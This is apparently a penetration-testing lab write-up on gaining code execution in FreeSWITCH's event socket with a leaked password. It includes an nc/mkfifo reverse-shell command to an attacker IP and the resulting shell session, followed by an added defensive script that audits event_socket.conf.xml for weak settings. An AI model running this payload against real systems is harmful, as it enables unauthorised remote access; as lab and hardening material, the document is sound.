RCE


The target FreeSWITCH instance has the mod_event_socket module installed and listening on port 8021. It was suspected that the instance was vulnerable to CVE-2019-19492 because of the default-password exposure found in the backup Samba share; however, testing showed this was not the case. Leveraging the remote file read vulnerability in the target Cassandra-Web instance, I was able to locate the real password: StrongClueConEight021. The exploit script was updated accordingly.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ python3 freeswitch-rce.py $IP id
Authenticated
Content-Type: api/response
Content-Length: 63
 
uid=998(freeswitch) gid=998(freeswitch) groups=998(freeswitch)

Command execution confirmed

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ python3 freeswitch-rce.py $IP 'mkfifo /tmp/ypzdi; nc 192.168.45.192 8021 0</tmp/ypzdi | /bin/sh >/tmp/ypzdi 2>&1; rm /tmp/ypzdi'
Authenticated

Sending the payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ nnc 8021
listening on [any] 8021 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.220.240] 36760
whoami
freeswitch
hostname
clue
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:77:65 brd ff:ff:ff:ff:ff:ff
    inet 192.168.220.240/24 brd 192.168.220.255 scope global ens192
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the freeswitch account.
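The foothold above depended on two things: an ESL listener reachable from the attacker's network and a password that could be recovered (stock default, or, as here, a real one leaked through a file-read bug and a backup share). The following audit script is an added example, not part of the original writeup or of FreeSWITCH; it parses an event_socket.conf.xml and flags the settings that make such an exposure possible, assuming the stock parameter names (listen-ip, listen-port, password, apply-inbound-acl) and using constructed sample configs.

```python
# Added example: audit a FreeSWITCH event_socket.conf.xml for the conditions
# that turn a leaked or default ESL password into command execution.
# Parameter names assume the stock config layout; sample configs are constructed.
import xml.etree.ElementTree as ET

DEFAULT_ESL_PASSWORD = "ClueCon"  # stock value behind CVE-2019-19492
MIN_PASSWORD_LENGTH = 16          # assumed policy threshold, not a FreeSWITCH setting


def audit_event_socket(xml_text):
    """Return a list of findings (empty list means no issue found)."""
    root = ET.fromstring(xml_text)
    # XML comments are dropped by the parser, so a commented-out ACL does not count.
    params = {p.get("name"): p.get("value") for p in root.iter("param")}
    findings = []

    password = params.get("password")
    if password is None or password == DEFAULT_ESL_PASSWORD:
        findings.append("password is the stock default (CVE-2019-19492)")
    elif len(password) < MIN_PASSWORD_LENGTH:
        findings.append("password shorter than %d characters" % MIN_PASSWORD_LENGTH)

    # ESL accepts 'api system ...' once authenticated, so network reach matters
    # as much as the secret: wildcard bind plus no ACL means any host may try.
    if params.get("listen-ip") in ("::", "0.0.0.0"):
        findings.append("ESL bound to all interfaces")
    if "apply-inbound-acl" not in params:
        findings.append("no inbound ACL; any client reaching the port may authenticate")
    return findings


# Constructed sample resembling the stock shipped config (weak).
WEAK_CONFIG = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="::"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
    <!--<param name="apply-inbound-acl" value="loopback.auto"/>-->
  </settings>
</configuration>"""

# Constructed hardened sample: loopback bind, ACL enabled, long unique password.
HARDENED_CONFIG = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="example-long-unique-secret-value"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>"""
```

Run it against the live config and also against anything found in backups or file shares, since a password that is strong but copied into a readable backup (as in this box) still fails the exposure check in practice.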